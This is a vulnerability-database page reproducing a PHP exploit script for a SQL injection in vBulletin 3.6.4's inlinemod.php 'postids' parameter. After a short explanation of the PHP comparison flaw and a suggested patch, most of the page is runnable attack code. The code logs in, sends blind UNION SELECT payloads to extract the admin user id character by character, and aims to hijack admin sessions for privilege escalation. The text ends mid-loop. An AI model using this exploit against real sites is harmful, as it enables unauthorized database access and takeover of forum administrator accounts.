Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit

🗓️ 01 Mar 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 13 Views

vBulletin version 3.6.4 inlinemod.php postids Remote SQL Injectio

Code

                                                <?php
print_r(\'
-----------------------------------------------------------------------------
vBulletin&nbsp;<=&nbsp;3.6.4&nbsp;inlinemod.php&nbsp;\"postids\"&nbsp;sql&nbsp;injection&nbsp;/&nbsp;privilege
escalation&nbsp;by&nbsp;session&nbsp;hijacking&nbsp;exploit
by&nbsp;rgod
mail:&nbsp;retrog&nbsp;at&nbsp;alice&nbsp;dot&nbsp;it
site:&nbsp;http://retrogod.altervista.org

Works&nbsp;regardless&nbsp;of&nbsp;php.ini&nbsp;settings,&nbsp;you&nbsp;need&nbsp;a&nbsp;Super&nbsp;Moderator&nbsp;account
to&nbsp;copy&nbsp;posts&nbsp;among&nbsp;threads,&nbsp;to&nbsp;be&nbsp;launched&nbsp;while&nbsp;admin&nbsp;is&nbsp;logged&nbsp;in&nbsp;to
the&nbsp;control&nbsp;panel,&nbsp;this&nbsp;will&nbsp;give&nbsp;you&nbsp;full&nbsp;admin&nbsp;privileges
note:&nbsp;this&nbsp;will&nbsp;flood&nbsp;the&nbsp;forum&nbsp;with&nbsp;empty&nbsp;threads&nbsp;even!
-----------------------------------------------------------------------------
\');

if&nbsp;($argc<7)&nbsp;{
print_r(\'
-----------------------------------------------------------------------------
Usage:&nbsp;php&nbsp;\'.$argv[0].\'&nbsp;host&nbsp;path&nbsp;user&nbsp;pass&nbsp;forumid&nbsp;postid&nbsp;OPTIONS
host:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;(ip/hostname)
path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path&nbsp;to&nbsp;vbulletin
user/pass:&nbsp;you&nbsp;need&nbsp;a&nbsp;moderator&nbsp;account
forumid:&nbsp;&nbsp;&nbsp;existing&nbsp;forum
postid:&nbsp;&nbsp;&nbsp;&nbsp;existing&nbsp;post
Options:
&nbsp;-p[port]:&nbsp;&nbsp;&nbsp;&nbsp;specify&nbsp;a&nbsp;port&nbsp;other&nbsp;than&nbsp;80
&nbsp;-P[ip:port]:&nbsp;specify&nbsp;a&nbsp;proxy
Example:
php&nbsp;\'.$argv[0].\'&nbsp;localhost&nbsp;/vbulletin/&nbsp;rgod&nbsp;mypass&nbsp;2&nbsp;121&nbsp;-P1.1.1.1:80
php&nbsp;\'.$argv[0].\'&nbsp;localhost&nbsp;/vbulletin/&nbsp;rgod&nbsp;mypass&nbsp;1&nbsp;143&nbsp;-p81
-----------------------------------------------------------------------------
\');
die;
}
/*
vulnerable&nbsp;code&nbsp;in&nbsp;inlinemod.php&nbsp;near&nbsp;lines&nbsp;185-209:

...
	case&nbsp;\'docopyposts\':

		$vbulletin->input->clean_array_gpc(\'p\',&nbsp;array(
			\'postids\'&nbsp;=>&nbsp;TYPE_STR,
		));

		$postids&nbsp;=&nbsp;explode(\',\',&nbsp;$vbulletin->GPC[\'postids\']);
		foreach&nbsp;($postids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$postid)
		{
			if&nbsp;($postids[\"$index\"]&nbsp;!=&nbsp;intval($postid))
			{
				unset($postids[\"$index\"]);
			}
		}

		if&nbsp;(empty($postids))
		{
			eval(standard_error(fetch_error(\'no_applicable_posts_selected\')));
		}

		if&nbsp;(count($postids)&nbsp;>&nbsp;$postlimit)
		{
			eval(standard_error(fetch_error(\'you_are_limited_to_working_with_x_posts\',&nbsp;$postlimit)));
		}
		break;
...
when&nbsp;an&nbsp;element&nbsp;of&nbsp;$postids&nbsp;array&nbsp;is&nbsp;not&nbsp;an&nbsp;integer,&nbsp;it&nbsp;fails&nbsp;to&nbsp;unset()&nbsp;the&nbsp;proper&nbsp;value.

An&nbsp;example:

<?php
$foo[1]=\"99999)&nbsp;UNION&nbsp;SELECT&nbsp;foo&nbsp;FROM&nbsp;foo&nbsp;WHERE&nbsp;foo=1&nbsp;LIMIT&nbsp;1/*\";
$foo[2]=intval($foo[1]);

echo&nbsp;$foo[1].\"
\";
echo&nbsp;$foo[2].\"
\";
if&nbsp;($foo[1]&nbsp;!=&nbsp;$foo[2])
{
&nbsp;echo&nbsp;\"they&nbsp;are&nbsp;different\";
}
else
{
&nbsp;echo&nbsp;\"they&nbsp;match!\";
}
?>

output:

99999)&nbsp;UNION&nbsp;SELECT&nbsp;foo&nbsp;FROM&nbsp;foo&nbsp;WHERE&nbsp;foo=1&nbsp;LIMIT&nbsp;1/*
99999
they&nbsp;match!

this&nbsp;because&nbsp;when&nbsp;php&nbsp;tries&nbsp;to&nbsp;comparise&nbsp;a&nbsp;string&nbsp;with&nbsp;an&nbsp;integer
it&nbsp;tries&nbsp;to&nbsp;convert&nbsp;the&nbsp;string&nbsp;in&nbsp;its&nbsp;integer&nbsp;value,&nbsp;it&nbsp;chooses&nbsp;the&nbsp;first&nbsp;integer&nbsp;chars
of&nbsp;the&nbsp;string&nbsp;itself!
so&nbsp;unset()&nbsp;never&nbsp;run!

the&nbsp;result&nbsp;is&nbsp;sql&nbsp;injection&nbsp;near&nbsp;lines&nbsp;3792-3800:

...
	$posts&nbsp;=&nbsp;$db->query_read_slave(\"
		SELECT&nbsp;post.postid,&nbsp;post.threadid,&nbsp;post.visible,&nbsp;post.title,&nbsp;post.username,&nbsp;post.dateline,&nbsp;post.parentid,&nbsp;post.userid,
			thread.forumid,&nbsp;thread.title&nbsp;AS&nbsp;thread_title,&nbsp;thread.postuserid,&nbsp;thread.visible&nbsp;AS&nbsp;thread_visible,&nbsp;thread.firstpostid,
			thread.sticky,&nbsp;thread.open,&nbsp;thread.iconid
		FROM&nbsp;\"&nbsp;.&nbsp;TABLE_PREFIX&nbsp;.&nbsp;\"post&nbsp;AS&nbsp;post
		LEFT&nbsp;JOIN&nbsp;\"&nbsp;.&nbsp;TABLE_PREFIX&nbsp;.&nbsp;\"thread&nbsp;AS&nbsp;thread&nbsp;USING&nbsp;(threadid)
		WHERE&nbsp;postid&nbsp;IN&nbsp;(\"&nbsp;.&nbsp;implode(\',\',&nbsp;$postids)&nbsp;.&nbsp;\")
		ORDER&nbsp;BY&nbsp;post.dateline
	\");
...

this&nbsp;exploit&nbsp;extract&nbsp;various&nbsp;session&nbsp;hashes&nbsp;from&nbsp;the&nbsp;database
to&nbsp;authenticate&nbsp;as&nbsp;admin&nbsp;and&nbsp;to&nbsp;change&nbsp;the&nbsp;privileges&nbsp;of&nbsp;a&nbsp;registered&nbsp;user
I&nbsp;could&nbsp;not&nbsp;find&nbsp;a&nbsp;way&nbsp;to&nbsp;see&nbsp;results&nbsp;inside&nbsp;html,&nbsp;so&nbsp;this&nbsp;asks&nbsp;true/false
questions&nbsp;to&nbsp;the&nbsp;database,&nbsp;copying&nbsp;posts&nbsp;around&nbsp;threads

possible&nbsp;patch,&nbsp;replace:
foreach&nbsp;($postids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$postid)
		{
		&nbsp;&nbsp;&nbsp;	if&nbsp;($postids[\"$index\"]&nbsp;!=&nbsp;intval($postid))
			{
			&nbsp;&nbsp;&nbsp;&nbsp;unset($postids[\"$index\"]);
			}
		}

with:

foreach&nbsp;($postids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$postid)
		{
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$postids[\"$index\"]=(int)$postids[\"$index\"];
	&nbsp;&nbsp;&nbsp;&nbsp;}


and,&nbsp;some&nbsp;line&nbsp;before:

foreach&nbsp;($threadids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$threadid)
		{
			if&nbsp;($threadids[\"$index\"]&nbsp;!=&nbsp;intval($threadid))
			{
				unset($threadids[\"$index\"]);
			}
		}

with:

foreach&nbsp;($threadids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$threadid)
		{
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$threadids[\"$index\"]=(int)$threadids[\"$index\"];
	&nbsp;&nbsp;&nbsp;&nbsp;}


vendor&nbsp;was&nbsp;contacted&nbsp;by&nbsp;email&nbsp;form...
*/

error_reporting(7);
ini_set(\"max_execution_time\",0);
ini_set(\"default_socket_timeout\",5);

function&nbsp;quick_dump($string)
{
&nbsp;&nbsp;$result=\'\';$exa=\'\';$cont=0;
&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=strlen($string)-1;&nbsp;$i++)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;if&nbsp;((ord($string[$i])&nbsp;<=&nbsp;32&nbsp;)&nbsp;|&nbsp;(ord($string[$i])&nbsp;>&nbsp;126&nbsp;))
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;.\";}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;\".$string[$i];}
&nbsp;&nbsp;&nbsp;if&nbsp;(strlen(dechex(ord($string[$i])))==2)
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;\".dechex(ord($string[$i]));}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;0\".dechex(ord($string[$i]));}
&nbsp;&nbsp;&nbsp;$cont++;if&nbsp;($cont==15)&nbsp;{$cont=0;&nbsp;$result.=\"
\";&nbsp;$exa.=\"
\";}
&nbsp;&nbsp;}
&nbsp;return&nbsp;$exa.\"
\".$result;
}
$proxy_regex&nbsp;=&nbsp;\'(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})\';
function&nbsp;sendpacketii($packet)
{
&nbsp;&nbsp;global&nbsp;$proxy,&nbsp;$host,&nbsp;$port,&nbsp;$html,&nbsp;$proxy_regex;
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen(gethostbyname($host),$port);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;\'.$host.\':\'.$port;&nbsp;die;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
	$c&nbsp;=&nbsp;preg_match($proxy_regex,$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$c)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'Not&nbsp;a&nbsp;valid&nbsp;proxy...\';die;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;$parts=explode(\':\',$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\"Connecting&nbsp;to&nbsp;\".$parts[0].\":\".$parts[1].\"&nbsp;proxy...
\";
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen($parts[0],$parts[1]);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;proxy...\';die;
	}
&nbsp;&nbsp;}
&nbsp;&nbsp;fputs($ock,$packet);
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fgets($ock);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((!feof($ock))&nbsp;or&nbsp;(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fread($ock,1);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=md5($argv[4]);
$forumid=(int)$argv[5];
$existing_post=(int)$argv[6];

$port=80;
$proxy=\"\";
for&nbsp;($i=3;&nbsp;$i<$argc;&nbsp;$i++){
$temp=$argv[$i][0].$argv[$i][1];
if&nbsp;(($temp<>\"-p\")&nbsp;and&nbsp;($temp<>\"-P\"))&nbsp;{$cmd.=\"&nbsp;\".$argv[$i];}
if&nbsp;($temp==\"-p\")
{
&nbsp;&nbsp;$port=str_replace(\"-p\",\"\",$argv[$i]);
}
if&nbsp;($temp==\"-P\")
{
&nbsp;&nbsp;$proxy=str_replace(\"-P\",\"\",$argv[$i]);
}
}
if&nbsp;(($path[0]<>\'/\')&nbsp;or&nbsp;($path[strlen($path)-1]<>\'/\'))&nbsp;{echo&nbsp;\'Error...&nbsp;check&nbsp;the&nbsp;path!\';&nbsp;die;}
if&nbsp;($proxy==\'\')&nbsp;{$p=$path;}&nbsp;else&nbsp;{$p=\'http://\'.$host.\':\'.$port.$path;}

$data=\"vb_login_username=$user\";
$data.=\"&vb_login_password=\";
$data.=\"&s=\";
$data.=\"&do=login\";
$data.=\"&vb_login_md5password=$pass\";
$data.=\"&vb_login_md5password_utf=$pass\";
$packet=\"POST&nbsp;\".$p.\"login.php&nbsp;HTTP/1.0
\";
$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"login.php
\";
$packet.=\"Accept-Language:&nbsp;en
\";
$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
$packet.=\"Pragma:&nbsp;no-cache
\";
$packet.=\"Connection:&nbsp;Close

\";
$packet.=$data;
sendpacketii($packet);
$cookie=\"\";
$temp=explode(\"Set-Cookie:&nbsp;\",$html);
for&nbsp;($i=1;&nbsp;$i<count($temp);&nbsp;$i++)
{
&nbsp;&nbsp;$temp2=explode(\"&nbsp;\",$temp[$i]);
&nbsp;&nbsp;$cookie.=\"&nbsp;\".trim($temp2[0]);
}
//echo&nbsp;\"your&nbsp;cookie&nbsp;->&nbsp;\".$cookie.\"

\";
if&nbsp;(!eregi(\"sessionhash\",$cookie)){die(\"failed&nbsp;to&nbsp;login...\");}$temp=str_replace(\"&nbsp;\",\"\",$cookie);$temp=str_replace(\"sessionhash\",\"\",$temp);
$temp=str_replace(\"lastvisit\",\"\",$temp);$temp=str_replace(\"lastactivity\",\"\",$temp);$temp=explode(\"=\",$temp);$temp=explode(\";\",$temp[1]);
$cookie_prefix=trim($temp[1]);echo&nbsp;\"cookie&nbsp;prefix&nbsp;->&nbsp;\".$cookie_prefix.\"
\";

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57));&nbsp;//numbers

$j=1;$uid=\"\";
echo&nbsp;\"admim&nbsp;user&nbsp;id&nbsp;->&nbsp;\";
while&nbsp;(!strstr($uid,chr(0)))
{
&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/usergroupid=6/**/LIMIT/**/1/*\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\"
\",$temp[1]);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0];

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\"
unknown&nbsp;query&nbsp;error...\");}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$uid.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\"
Exploit&nbsp;failed...\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;}
$j++;
}
if&nbsp;(trim($uid)==\"\"){die(\"
Exploit&nbsp;failed...\");}else{echo&nbsp;\"
vulnerable!\";}
$uid=intval($uid);

function&nbsp;my_encode($my_string)
{
&nbsp;&nbsp;$encoded=\"CHAR(\";
&nbsp;&nbsp;for&nbsp;($k=0;&nbsp;$k<=strlen($my_string)-1;&nbsp;$k++)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$encoded.=ord($my_string[$k]);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($k==strlen($my_string)-1)&nbsp;{$encoded.=\")\";}
&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;{$encoded.=\",\";}
&nbsp;&nbsp;}
&nbsp;&nbsp;return&nbsp;$encoded;
}


$j=1;$my_uid=\"\";
echo&nbsp;\"
your&nbsp;user&nbsp;id&nbsp;->&nbsp;\";
while&nbsp;(!strstr($my_uid,chr(0)))
{
&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username=\".my_encode($user).\"/**/LIMIT/**/1/*\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\"
unknown&nbsp;query&nbsp;error...\");}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html);
